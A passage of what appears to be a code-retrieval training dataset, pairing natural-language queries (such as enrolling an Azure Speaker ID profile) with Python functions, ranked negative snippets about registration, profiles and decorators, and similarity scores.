cfg = DispatchContext.current.query(tgt, workload)\n node = topi_compute(cfg, *args)\n\n # attach workload to return op\n op = node.op\n attrs = {}\n for k, v in node.op.attrs.items():\n attrs[k] = v\n attrs[\"workload\"] = workload\n if isinstance(op, tensor.ComputeOp):\n op = tvm.te._ffi_api.ComputeOp(op.name, op.tag, attrs, op.axis, op.body)\n elif isinstance(op, tensor.ExternOp):\n op = tvm.te._ffi_api.ExternOp(\n op.name,\n op.tag,\n attrs,\n op.inputs,\n op.input_placeholders,\n op.output_placeholders,\n op.body,\n )\n else:\n raise RuntimeError(\"Unsupported op type: \" + str(type(op)))\n\n if isinstance(node, tensor.Tensor):\n return op.output(0)\n return [op.output(i) for i in range(len(node))]\n\n return wrapper\n\n if func:\n return _decorate(func)\n return _decorate", "def Register(self, name, fn):\n name = normalizeStr(name)\n Logger.Debug(\"Registering Formatter:\", name)\n self._formatters[name] = fn", "def add_renderer_globals(event):\r\n request = event['request']\r\n event['_'] = request.translate\r\n event['ungettext'] = request.ungettext\r\n event['localizer'] = request.localizer", "def register(self, funcs):\n for name, func in funcs.items():\n self.functions[name] = func", "def addGlobalFunction(self,function:TFunction):\n self.globalFunctions.put(function.name,function)", "def threaded_callback(self, func):\n\n self.th_func_map[func.__name__] = func", "def _context(name, func):\n\tpush_aspect(name, func)\n\tyield\n\tpop_aspect(name)", "def register(obj_name, obj):\n if obj_name not in ninja_globals['register']:\n ninja_globals['register'][obj_name] = obj", "def register(self, param):\n\n def decorator(key, value):\n self[key] = value\n return value\n\n if callable(param):\n return decorator(None, param)\n return lambda x: decorator(param, x)", "def register_compat_handler(self, func, version):\n tf_op.register_handler(func, version, self.names, self.domain, self.kwargs)", "def register_code(args, namespace, notifier=None):\n\n if args.type == 'passthrough':\n user_code = None\n else:\n filename = args.code.filename\n args.code = args.code.stream.read()\n tempdir = tempfile.mkdtemp()\n user_code = extract(filename, args.code, tempdir)\n return register(Service, args, namespace, user_code, notifier)", "def basic_wrapper( function ):\n\n #=========================================================================\n def callback( context ):\n \"\"\"\n The callback function with a single call-time context argument.\n \"\"\"\n return '<tag>{}</tag>'.format( function( context ) )\n return callback", "def template_function(self, node, ordered_functions):\n oldoptions = node.options\n headers_typedef = collections.OrderedDict()\n\n # targs - ast.TemplateArgument\n for iargs, targs in enumerate(node.template_arguments):\n new = node.clone()\n ordered_functions.append(new)\n self.append_function_index(new)\n\n new._generated = \"cxx_template\"\n\n fmt = new.fmtdict\n if targs.fmtdict:\n fmt.update(targs.fmtdict)\n\n # Use explicit template_suffix if provide.\n # If single template argument, use type's explicit_suffix\n # or the unqualified flat_name.\n # Multiple template arguments, use sequence number.\n if fmt.template_suffix:\n pass\n elif len(targs.asts) == 1:\n ntypemap = targs.asts[0].typemap\n if ntypemap.template_suffix:\n fmt.template_suffix = ntypemap.template_suffix\n else:\n fmt.template_suffix = \"_\" + ntypemap.flat_name\n else:\n fmt.template_suffix = \"_\" + str(iargs)\n\n new.cxx_template = {}\n fmt.CXX_template = targs.instantiation # ex. <int>\n\n # Gather headers required by template arguments.\n for targ in targs.asts:\n ntypemap = targ.typemap\n headers_typedef[ntypemap.name] = ntypemap\n\n self.push_instantiate_scope(new, targs)\n\n if new.ast.template_argument:\n iast = getattr(self.instantiate_scope, new.ast.template_argument)\n new.ast = new.ast.instantiate(node.ast.instantiate(iast))\n # Generics cannot differentiate on return type\n new.options.F_create_generic = False\n\n # Replace templated arguments.\n # arg - declast.Declaration\n newparams = []\n for arg in new.ast.declarator.params:\n if arg.template_argument:\n iast = getattr(self.instantiate_scope, arg.template_argument)\n newparams.append(arg.instantiate(iast))\n else:\n newparams.append(arg)\n new.ast.declarator.params = newparams\n self.pop_instantiate_scope()\n\n new.gen_headers_typedef = headers_typedef\n # Do not process templated node, instead process\n # generated functions above.\n node.wrap.clear()", "def test_register_context_error(self):\n @self.skill.register('test_logic')\n def sample_func():\n \"\"\"Decorated function.\"\"\"\n pass\n self.skill.logic['test_logic']()\n self.assertRaises(RuntimeError, sample_func)", "def run(context: components.Components):\n\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n def _child_context():\n buvar_context.set(context)\n return func(*args, **kwargs)\n\n ctx = contextvars.copy_context()\n return ctx.run(_child_context)\n\n return wrapper\n\n return decorator", "def includeme(config):\n config.add_subscriber(add_renderer_globals, BeforeRender)\n config.add_subscriber(add_localizer, NewRequest)\n config.add_subscriber(add_csrf_validation, NewRequest)\n config.add_subscriber(add_resources, NewRequest)", "def register(name):\n def func(cls):\n \"\"\"\n See register\n \"\"\"\n REGISTRY[name] = cls()\n return cls\n return func", "def preprocess_func(cls, func):\n return func", "def __call__(self, path):\n def wrapper(application):\n self.register(path, application)\n return application\n return wrapper", "def add(self, context):\n self._contexts.add(context)", "def register_inlinequery_handler(self, function_):\n assert decorators.has_inlinequery(function_)\n for query in getattr(function_, '_TELEGRAM_inlinequery'):\n self._inlinequery_reg[query] = function_" ]
[ "0.56674093", "0.56304383", "0.5513914", "0.5493239", "0.5407706", "0.5372997", "0.52977866", "0.52085143", "0.5204628", "0.51973486", "0.5171223", "0.51613235", "0.51562536", "0.51132387", "0.5089765", "0.50798845", "0.5026726", "0.499174", "0.4989556", "0.49833864", "0.49706504", "0.49704543", "0.4954364", "0.49457413", "0.49374548", "0.493102", "0.49267408", "0.49232724", "0.4909595", "0.49087003", "0.4899992", "0.48758927", "0.4853122", "0.4852713", "0.48363546", "0.48072746", "0.4802387", "0.47976443", "0.47864455", "0.47485548", "0.47469166", "0.47428554", "0.4739203", "0.4725738", "0.4723522", "0.47226787", "0.470985", "0.47021407", "0.46966815", "0.46948013", "0.46929786", "0.46925268", "0.46887207", "0.46875125", "0.4666406", "0.46627232", "0.46627086", "0.46627086", "0.46619922", "0.46615422", "0.46537733", "0.46535292", "0.46521255", "0.46454808", "0.46364346", "0.46357763", "0.46314222", "0.46179023", "0.46149054", "0.46094424", "0.46090034", "0.4607908", "0.46033219", "0.45977312", "0.4595452", "0.45939237", "0.45881987", "0.45829782", "0.45825672", "0.4582372", "0.4575122", "0.4573272", "0.45641288", "0.45639896", "0.45587584", "0.45527768", "0.4549209", "0.45458502", "0.45425966", "0.45408285", "0.4536185", "0.4532845", "0.4522489", "0.4522315", "0.45093834", "0.45059133", "0.4502844", "0.44999266", "0.44942328", "0.44929507" ]
0.75228786
0
Enroll a new profile to Azure Speaker ID.
def enroll_profile(region, subscription_key, wav_path): fs, audio_data = _check_and_load_wav_file_length(wav_path) profile_id = _add_profile(region, subscription_key) url = "%s/speaker/identification/v2.0/text-independent/profiles/%s/enrollments" % ( _get_azure_endpoint(region), profile_id) headers = { "Ocp-apim-subscription-key": subscription_key, "Content-Type": "audio/wav; codecs=audio/pcm; samplerate=%s" % fs, } session = requests.Session() resp = session.post(url, headers=headers, data=audio_data) print("Enrollment response status code: %s\n" % resp.status_code) print(json.dumps(json.loads(resp.content), indent=2))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def put(self, id):\n adm = Administration()\n print(api.payload)\n lp = LearnProfile.from_dict(api.payload)\n if lp is not None:\n lp.set_id(id)\n adm.save_learnprofile(lp)\n return lp, 200\n\n else:\n return '', 500", "def perform_create(self, serializer):\r\n serializer.save(user_type=\"SPEAKER\")", "def perform_create(self, serializer):\n profile = models.Profile.objects.get(pk=self.kwargs.get(\"pk\"))\n\n return serializer.save(profile=profile)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n # create new Stellar account\n stellar.api.create_account(user=instance)", "def createProfile(self):\n if self.profile:\n return\n from soc.modules.gsoc.models.profile import GSoCProfile\n user = self.createUser()\n properties = {'link_id': user.link_id, 'student_info': None, 'user': user,\n 'parent': user, 'scope': self.program, 'status': 'active'}\n self.profile = seeder_logic.seed(GSoCProfile, properties)", "def perform_create(self, serializer):\n topic = models.ProfileTopic.objects.get(pk=self.kwargs.get(\"pk\"))\n\n return serializer.save(topic=topic)", "def set_speaker(self, identifier):\n self.up_to_date = False\n self._speaker = identifier", "def add_profile(self, profile):\r\n self.profiles.append(profile)", "def save_profile(sender, instance, **kwargs):\n instance.profile.save()", "def update_profile(id):\n tags = request.form.get('tags')\n user = User.query.get(id)\n speaker = Speaker.query.filter_by(id_assigned_user=user.id).first()\n\n speaker.tags = tags\n try:\n db.session.commit()\n except:\n abort(500)\n\n return redirect(url_for('get_profile', id=user.id))", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def new_profile(email):\n key = challenge_12.deterministic_random_key()\n profile = bytes(profile_for(email.decode()), 'ascii')\n\n return challenge_11.AES_ECB(key).encrypt(profile)", "def enable(self,\n profile_id=None):\n if profile_id is None:\n self._enabled = True\n else:\n self._profiles[profile_id] = True", "def perform_create(self, serializer):\n serializer.save(user_profile = self.request.user)", "def save_profile(self):\n self.save()", "def put(self, id ):\n adm = Administration()\n print(api.payload)\n p = Profile.from_dict(api.payload)\n if p is not None:\n p.set_id(id)\n adm.save_profile(p)\n return p, 200\n else:\n return '', 500", "def create(self, validated_data):\n return Speaker.objects.create(**validated_data)", "def enrol(self, enrol_data):\n self.busy_wait(enrol_cost)\n return {'speaker': enrol_data['speaker'], 'room': enrol_data['room']}", "def perform_create(self, serializer): # this method runs everytime a POST method is called\n serializer.save(user_profile=self.request.user)", "def switch_profile(self, params):\n profile_id = params.get('profile_id', [''])[0]\n switch_profile = self.netflix_session.switch_profile(\n profile_id=profile_id,\n account=self.credentials)\n return switch_profile", "def test_update_profile(self):\n self.cim.update_profile(\n customer_id=u\"222\",\n description=u\"Foo bar baz quz\",\n email=u\"dialtone@gmail.com\",\n customer_profile_id=u\"122\"\n )", "def perform_create(self,serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self,serializer):\n serializer.save(user_profile=self.request.user)", "def createStudent(self):\n self.createProfile()\n from soc.modules.gsoc.models.profile import GSoCStudentInfo\n properties = {'key_name': self.profile.key().name(), 'parent': self.profile}\n self.profile.student_info = seeder_logic.seed(GSoCStudentInfo, properties)\n self.profile.put()", "async def on_speaking(self, speaking, uid):\n pass", "def create(profile, name):\n client = boto3client.get(\"iam\", profile)\n params = {}\n params[\"InstanceProfileName\"] = name\n return client.create_instance_profile(**params)", "async def test_create(self):\n expected = {\n 'id': 'id'\n }\n profile = {\n 'name': 'name',\n 'version': 4,\n }\n rsps = respx.post(f'{PROVISIONING_API_URL}/users/current/provisioning-profiles') \\\n .mock(return_value=Response(200, json=expected))\n id = await provisioning_client.create_provisioning_profile(profile)\n assert rsps.calls[0].request.url == f'{PROVISIONING_API_URL}/users/current/provisioning-profiles'\n assert rsps.calls[0].request.headers['auth-token'] == 'header.payload.sign'\n assert rsps.calls[0].request.content == json.dumps(profile).encode('utf-8')\n assert id == expected", "def create_profile(sender, instance, signal, created, **kwargs):\n \n from phylocommons.models import UserProfile\n \n if created:\n UserProfile(user = instance).save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def add_speaker(self, name, audio_sample):\n if name in self.speakers:\n print(\"Error: %s is already a speaker\" % name)\n return\n \n self.speakers.append(name)\n\n features_left, features_right = self.extract_features(audio_sample)\n\n if self.both_channels:\n self.save_data(name, (features_left, features_right))\n else:\n self.save_data(name, (features_left))\n\n self.train_model()", "def putProfile(profileType,value):\n # PUT /profile/$profileType\n pass", "def perform_create(self, serializer):\n print(self.request.user)\n serializer.save(user_profile=self.request.user)", "def test_upsert_profile(mocker, mock_es_profile_serializer, user):\n patched_task = mocker.patch(\"search.search_index_helpers.tasks.upsert_profile\")\n upsert_profile(user.profile.id)\n patched_task.assert_called_once_with(user.profile.id)", "def create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def handle_simplerenroll(self):\n self.handle_simpleenroll()", "def save(self, *args, **kwargs):\r\n\r\n if not self.trackerid:\r\n self.trackerid = generate_trackerid()\r\n super(Profile, self).save(*args, **kwargs)", "def save(self, *args, **kwargs):\n\n if not self.trackerid:\n self.trackerid = generate_trackerid()\n super(Profile, self).save(*args, **kwargs)", "def test_second_speaker_profile_page(self):\n second_speaker = Speaker.objects.create(name=\"Nancy Pelosi\")\n self.first_presentation.additional_speakers.add(second_speaker)\n\n response = self.client.get(\n reverse(\n \"speaker_profile\",\n args=[second_speaker.pk, second_speaker.slug],\n )\n )\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, FIRST_PRESENTATION_TITLE)\n self.assertNotContains(response, SECOND_PRESENTATION_TITLE)", "def create_profile(sender, **kw):\n user = kw['instance']\n if kw['created']:\n profile = UserProfile(user=user)\n profile.save()", "def set_profile(self, profile: str):\n self._profile = profile", "def create_profile(sender, instance, signal, created, **kwargs):\n \n from tutablr_app.models import UserProfile\n \n if created:\n UserProfile.objects.get_or_create(user = instance);\n # Do additional stuff here if needed, e.g.\n # create other required related records", "def add_speaker(self, identifier, score):\n val = float(score)\n if not identifier in self.speakers:\n self.speakers[identifier] = val\n else:\n if self.speakers[identifier] < val:\n self.speakers[identifier] = val", "def _1_profile(self, _1_profile):\n\n self.__1_profile = _1_profile", "def new_sddc_ipsec_vpn_ike_profile(**kwargs):\n proxy = kwargs['proxy']\n session_token = kwargs['sessiontoken']\n display_name = kwargs['display_name']\n ike_ver = kwargs['ike_version']\n dh_group = kwargs['dh_group']\n digest_algo = kwargs['digest_algo']\n encrypt_algo = kwargs['encrypt_algo']\n\n # Check for incompatible IKE profile options\n if 'AES_GCM_256' in encrypt_algo and ike_ver != 'IKE_V2':\n sys.exit(f'AES GCM encryption algorithms require IKE V2')\n elif 'AES_GCM_192' in encrypt_algo and ike_ver != 'IKE_V2':\n sys.exit(f'AES GCM encryption algorithms require IKE V2')\n elif 'AES_GCM_128' in encrypt_algo and ike_ver != 'IKE_V2':\n sys.exit(f'AES GCM encryption algorithms require IKE V2')\n elif 'AES_GCM_256' in encrypt_algo and digest_algo:\n sys.exit(f'AES GCM encryption algorithm cannot be configured with a digest algorithm')\n elif 'AES_GCM_192' in encrypt_algo and digest_algo:\n sys.exit(f'AES GCM encryption algorithm cannot be configured with a digest algorithm')\n elif 'AES_GCM_128' in encrypt_algo and digest_algo:\n sys.exit(f'AES GCM encryption algorithm cannot be configured with a digest algorithm')\n else:\n pass\n\n # Build JSON data\n json_data = {\n \"resource_type\": \"IPSecVpnIkeProfile\",\n \"display_name\": display_name,\n \"id\": display_name,\n \"encryption_algorithms\": encrypt_algo,\n \"digest_algorithms\": digest_algo,\n \"dh_groups\": dh_group,\n \"ike_version\": ike_ver\n }\n json_response_status_code = new_ipsec_vpn_ike_profile_json(proxy, session_token, display_name, json_data)\n if json_response_status_code == 200:\n sys.exit(f'IKE Profile {display_name} was created successfully')\n else:\n print('There was an error')\n sys.exit(1)", "def perform_create(self, serializer):\n if serializer.instance is None:\n profile = Profile.objects.get(user=self.request.user)\n #print profile\n serializer.save(owner=profile)", "def create_pootle_profile(sender, instance, **kwargs):\n try:\n profile = instance.get_profile()\n except PootleProfile.DoesNotExist:\n profile = PootleProfile(user=instance)\n profile.save()", "def create_profile(sender, **kwargs):\n user = kwargs[\"instance\"]\n if kwargs[\"created\"]:\n user_profile = Profile(user=user)\n user_profile.save()", "def handle_speak(event):\n context = {'client_name': 'mycroft_listener',\n 'source': 'audio',\n 'destination': [\"skills\"]}\n bus.emit(Message('speak', event, context))", "def manage_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n else:\n instance.profile.save()", "def create_profile(sender, instance, created, **kwargs):\n if created: \n profile, new = UserProfile.objects.get_or_create(user=instance)", "def create_profile(sender, instance, created, **kwargs):\n if created:\n profile, created = UserProfile.objects.get_or_create(user=instance)", "def profile_name(self, profile_name):\n\n self._profile_name = profile_name", "def profile_name(self, profile_name):\n\n self._profile_name = profile_name", "def saveOkcupidProfile(self, username, profile_source):\n\t\tdata = lzma.compress(profile_source.encode())\n\t\tencoded = base64.b64encode(data).decode('utf-8')\n\t\tuser = self.getOkcupidUser(username)\n\t\tif not user:\n\t\t\tself.logger.info(\"Storing user profile: %s\", username)\n\t\t\tuser = Models.Okcupid(username)\n\t\t\tuser.source = encoded\n\t\t\tself.session.add(user)\n\t\t\tself.session.commit()\n\t\telse:\n\t\t\tself.logger.info(\"Updating user profile: %s\", username)\n\t\t\tuser.source = encoded\n\t\t\tself.session.commit()", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def save_user_profile(instance, **_):\n instance.profile.save()", "def register(self,\n profile_id=None,\n enabled=False):\n\n if profile_id is not None:\n # Check whether profile has already been registered.\n if profile_id not in self._profiles:\n # Register profile (disabled by default)\n self._profiles[profile_id] = enabled", "def ssl_profile_id(self, ssl_profile_id):\n\n self._ssl_profile_id = ssl_profile_id", "def add_skills_to_profile():\n # get specific objects\n profile = storage.get(\"Profile\", profile_id)\n skills = storage.get(\"Skills\", skills_id)\n if profile is not None and skills is not None:\n # check every skill in profile\n for profile_skill in profile.skills:\n # if the given skill is already linked to profile, return\n if profile_skill.id == skills.id:\n return jsonify(skills.to_dict()), 200\n # if skill is not in profile, append skill and save\n profile.skills.append(skills)\n profile.save()\n return jsonify(skills.to_dict()), 201\n\n # if id not in database, abort\n abort(404)", "def create_ids_profile(**kwargs):\n sessiontoken = kwargs['sessiontoken']\n proxy = kwargs['proxy']\n display_name = kwargs['objectname']\n # stage the necessary JSON payload\n json_data = {\n \"profile_severity\": [\n \"CRITICAL\",\n \"HIGH\",\n \"MEDIUM\",\n \"LOW\"\n ],\n \"criteria\": [],\n \"resource_type\": \"IdsProfile\",\n \"display_name\": display_name,\n \"id\": display_name\n }\n # set value for CVSS severity, if configured by user\n if kwargs['cvss'] is not None:\n cvss = kwargs['cvss']\n cvss_criteria = {\n \"filter_name\": \"CVSS\",\n \"filter_value\": cvss,\n \"resource_type\": \"IdsProfileFilterCriteria\"\n }\n filter_operator = {\n \"operator\": \"AND\",\n \"resource_type\": \"IdsProfileConjunctionOperator\"\n }\n # update 'criteria' key in json payload\n json_data['criteria'].append(cvss_criteria)\n json_data['criteria'].append(filter_operator)\n # set value(s) for products affected, if configured by user\n if kwargs['product_affected'] is not None:\n pa = kwargs['product_affected']\n pa_criteria = {\n \"filter_name\": \"PRODUCT_AFFECTED\",\n \"filter_value\": pa,\n \"resource_type\": \"IdsProfileFilterCriteria\"\n }\n # update 'criteria' key in json payload\n json_data['criteria'].append(pa_criteria)\n response_code = patch_ips_profile_json(proxy, sessiontoken, json_data, display_name)\n if response_code == 200:\n print(f'The IDS Profile {display_name} has been created successfully')\n else:\n print(f'There was an error, please check your syntax')\n sys.exit(1)", "def perform_create(self, serializer):\n item = models.ProfileItem.objects.get(pk=self.kwargs.get(\"pk\"))\n\n return serializer.save(profile_item=item)", "def install_single_profile(self, install_single_profile):\n\n self._install_single_profile = install_single_profile", "def save_user_receiver(sender, instance, created, *args, **kwargs):\n print(\"profile created\", instance)\n if created:\n new_profile = UserProfile.objects.get_or_create(owner=instance)", "def add_spawning_profile(intersection, spawning_profile):\n return intersection.add_spawning_profile(spawning_profile)", "def test_user_set_profile():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n r = client.get('/profile')\n with client.session_transaction() as sess:\n data = {\n 'name': 'user',\n 'email': 'user@ctfd.io',\n 'confirm': '',\n 'password': '',\n 'affiliation': 'affiliation_test',\n 'website': 'https://ctfd.io',\n 'country': 'United States of America',\n 'nonce': sess.get('nonce')\n }\n\n r = client.post('/profile', data=data)\n assert r.status_code == 302\n\n user = Teams.query.filter_by(id=2).first()\n assert user.affiliation == 'affiliation_test'\n assert user.website == 'https://ctfd.io'\n assert user.country == 'United States of America'\n destroy_ctfd(app)", "def cli_enable_profile():\n parser = argparse.ArgumentParser(description=cli_enable_profile.__doc__)\n type_select = parser.add_mutually_exclusive_group(required=False)\n type_select.add_argument(\"-i\", \"--iam\", action=\"store_true\", help=\"IAM user type profile\")\n type_select.add_argument(\"-a\", \"--azure\", action=\"store_true\", help=\"Azure login type profile\")\n type_select.add_argument(\"-n\", \"--ndt\", action=\"store_true\", help=\"NDT assume role type profile\")\n if \"_ARGCOMPLETE\" in os.environ:\n parser.add_argument(\"profile\", help=\"The profile to enable\").completer = \\\n ChoicesCompleter(read_profiles())\n argcomplete.autocomplete(parser)\n else:\n parser.add_argument(\"profile\", help=\"The profile to enable\")\n args = parser.parse_args()\n if args.iam:\n profile_type = \"iam\"\n elif args.azure:\n profile_type = \"azure\"\n elif args.ndt:\n profile_type = \"ndt\"\n else:\n profile = get_profile(args.profile)\n if \"azure_tenant_id\" in profile:\n profile_type = \"azure\"\n elif \"ndt_role_arn\" in profile:\n profile_type = \"ndt\"\n else:\n profile_type = \"iam\"\n enable_profile(profile_type, args.profile)", "def assign_profile(name, properties):\n profile_dict = {'time': Time, 'streq': Streq, 'domain': Domain, 'use': Use}\n return profile_dict[name](properties)", "def enroll_certificate(self, kwargs):\n return self.__query(\"certificateEnroll\", kwargs)", "def enroll(cls, user, course_key, mode=\"honor\"):\r\n enrollment = cls.get_or_create_enrollment(user, course_key)\r\n enrollment.update_enrollment(is_active=True, mode=mode)\r\n return enrollment", "def perform_create(self, serializer):\n serializer.save(user_id=self.request.user)\n up = UserProfile.objects.get(user=self.request.user)\n up.greyfish_active = True\n up.save()", "def create_or_update_user_profile(sender, instance, created, **kwargs):\n\n # Create profile and set ACTIVE status to account -- TODO : ACTIVE STATUS\n if created:\n Profile.objects.create(user=instance, status=Status.get_or_create_status(strings.ACTIVE_STATUS))\n\n else:\n instance.profile.save()", "def set_profile_version(context, profile_id, version):\n\n check_profile_id(profile_id)\n ps = getToolByName(context, 'portal_setup')\n\n ps.setLastVersionForProfile(profile_id, unicode(version))\n assert(ps.getLastVersionForProfile(profile_id) == (version, ))\n print \"Set version for '%s' to '%s'.\" % (profile_id, version)", "def add_profile(self, request, *args, **kwargs):\n # Todo (mo): utilize self.get_serializer(instance=conversation, data=request.data)\n context = {\n 'conversation': self.get_object(),\n 'request': request\n }\n serializer = AddProfileSerializer(data=request.data, context=context)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_202_ACCEPTED)", "def create_or_update_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.get_or_create(user=instance)\n instance.profile.save()", "def enroll_student(self, student_email):\n # check if course exists\n if not self.is_course_exists():\n print(\"The given course not found\")\n return\n\n if self.is_student_enrolled(student_email):\n print(\"The course is not exists or/ and student {} is already enrolled\".format(student_email))\n return\n else:\n db = self._file.read_db()\n for crs_i in range(len(db[\"courses\"])):\n if db[\"courses\"][crs_i][\"course_name\"] == self._course_name:\n db[\"courses\"][crs_i][\"students\"].append(student_email)\n break\n self._file.write_db(db)\n print(\"The new student is enrolled to course: {}\".format(self._course_name))", "def setprofile(variable, value, account, pair):\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n keys = []\n values = []\n if pair:\n for p in pair:\n key, value = p.split(\"=\")\n keys.append(key)\n values.append(value)\n if variable and value:\n keys.append(variable)\n values.append(value)\n\n profile = Profile(keys, values)\n\n if not account:\n account = mph.config[\"default_account\"]\n if not unlock_wallet(stm):\n return\n acc = Account(account, morphene_instance=stm)\n\n json_metadata = Profile(acc[\"json_metadata\"] if acc[\"json_metadata\"] else {})\n json_metadata.update(profile)\n tx = acc.update_account_profile(json_metadata)\n tx = json.dumps(tx, indent=4)\n print(tx)", "def create_profile(sender, **kwargs):\n\n # I import profile here cause i can't import it right in the top.\n from .profiles import Profile\n\n user = kwargs['instance']\n\n Profile.objects.get_or_create(user=user)", "def create_lookalike_audience(self, account_id, name, audience_id,\n lookalike_spec, batch=False):\n path = \"act_%s/customaudiences\" % account_id\n args = {\n 'name': name,\n 'origin_audience_id': audience_id,\n 'lookalike_spec': json.dumps(lookalike_spec),\n }\n return self.make_request(path, 'POST', args, batch)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n user_profile = UserProfile.objects.create(user=instance)", "def on_signup(self, data):\n self.participant_id = data[\"participant\"][\"id\"]", "def make_instructor(course, user_email):\r\n CourseStaffRole(course.id).add_users(User.objects.get(email=user_email))", "def create_custom_audience(self, account_id, name, subtype=None,\n description=None, rule=None, opt_out_link=None,\n retention_days=30, batch=False):\n path = \"act_%s/customaudiences\" % account_id\n args = {\n 'name': name,\n }\n if subtype:\n args['subtype'] = subtype\n if description:\n args['description'] = description\n if rule:\n args['rule'] = json.dumps(rule)\n if opt_out_link:\n args['opt_out_link'] = opt_out_link\n if retention_days:\n args['retention_days'] = retention_days\n return self.make_request(path, 'POST', args, batch=batch)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n profile = UserProfile()\n profile.user = instance\n profile.email=instance.email\n profile.save()", "def _add_profile(self, vip, profile_name, bigip, context='all'):\n v = bigip.tm.ltm.virtuals.virtual\n obj = v.load(name=vip[\"name\"], partition=vip[\"partition\"])\n p = obj.profiles_s\n profiles = p.get_collection()\n\n # see if profile exists\n for profile in profiles:\n if profile.name == profile_name:\n return\n\n # not found -- add profile (assumes Common partition)\n p.profiles.create(name=profile_name,\n partition='Common',\n context=context)\n LOG.debug(\"Created profile %s\" % profile_name)", "def create_instructor(self, username):\r\n return self._create_user(username, is_staff=True)", "def make_profile_for_user(sender, instance, **kwargs):\n if kwargs['created']:\n new_profile = ImagerProfile(user=instance)\n new_profile.save()", "def profile_create(faker_obj=fake_init()):\n profile = faker_obj.simple_profile()\n user = User.objects.create(\n username=profile[\"username\"],\n email=profile[\"mail\"],\n password=profile[\"username\"][::-1],\n )\n return user.id", "def create_user_profile(sender, instance, created, **kwargs):\n\n if created:\n user_profile = UserProfile.objects.create(user=instance)", "def create(\n name: str,\n from_name: str = typer.Option(None, \"--from\", help=\"Copy an existing profile.\"),\n):\n\n profiles = prefect.settings.load_profiles()\n if name in profiles:\n app.console.print(\n textwrap.dedent(\n f\"\"\"\n [red]Profile {name!r} already exists.[/red]\n To create a new profile, remove the existing profile first:\n\n prefect profile delete {name!r}\n \"\"\"\n ).strip()\n )\n raise typer.Exit(1)\n\n if from_name:\n if from_name not in profiles:\n exit_with_error(f\"Profile {from_name!r} not found.\")\n\n # Create a copy of the profile with a new name and add to the collection\n profiles.add_profile(profiles[from_name].copy(update={\"name\": name}))\n else:\n profiles.add_profile(prefect.settings.Profile(name=name, settings={}))\n\n prefect.settings.save_profiles(profiles)\n\n app.console.print(\n textwrap.dedent(\n f\"\"\"\n Created profile with properties:\n name - {name!r}\n from name - {from_name or None}\n\n Use created profile for future, subsequent commands:\n prefect profile use {name!r}\n\n Use created profile temporarily for a single command:\n prefect -p {name!r} config view\n \"\"\"\n )\n )", "def create_speaker(conn, speaker):\n\n sql = ''' INSERT INTO speaker(name,gender,native)\n VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, speaker)\n return cur.lastrowid", "def add_talk(talk):\n # Check if this user is already registered\n exists = check_attendee_exists(talk.userId, talk.profile)\n if not exists[0]:\n return False\n\n talk.put()\n return True", "def begin_trial(self):\n self._post(endpoint='{}/cm/trial/begin'.format(self.api_version))" ]
[ "0.57121813", "0.5669998", "0.55642205", "0.5468942", "0.54388547", "0.5423377", "0.5405765", "0.53824395", "0.5380911", "0.5366512", "0.52692974", "0.52692974", "0.52692974", "0.52692974", "0.52692974", "0.52692974", "0.525241", "0.5236725", "0.5225078", "0.52119666", "0.5204216", "0.52007973", "0.51753956", "0.51603705", "0.51337224", "0.5130088", "0.5123543", "0.5123543", "0.5117897", "0.51121044", "0.50973123", "0.50852376", "0.5073346", "0.5060513", "0.5060513", "0.50574136", "0.5055051", "0.5036927", "0.5032426", "0.50267255", "0.5014151", "0.4993713", "0.49911597", "0.49909627", "0.4972889", "0.49611044", "0.4958676", "0.49556434", "0.49445084", "0.49416524", "0.49344113", "0.490239", "0.48976094", "0.4894072", "0.4893976", "0.48931438", "0.48916373", "0.48827493", "0.48827493", "0.4875042", "0.48737988", "0.48737988", "0.48737988", "0.48686683", "0.4868511", "0.48651016", "0.48617485", "0.48533455", "0.48483136", "0.4848121", "0.48460466", "0.483473", "0.4832703", "0.48136112", "0.4800454", "0.4798535", "0.47802028", "0.477676", "0.4776245", "0.47754008", "0.4757277", "0.4744285", "0.47352207", "0.4731061", "0.47224116", "0.47192314", "0.46932518", "0.4689908", "0.46898186", "0.4682167", "0.46814996", "0.46654874", "0.4662874", "0.46615365", "0.46593606", "0.4658677", "0.4656493", "0.46511608", "0.46452612", "0.46446502" ]
0.72638845
0
Calculates the number of suicides for a type of agent given game mode, observability, and game seed. If game seed passed is 1, then all game seeds are aggregated.
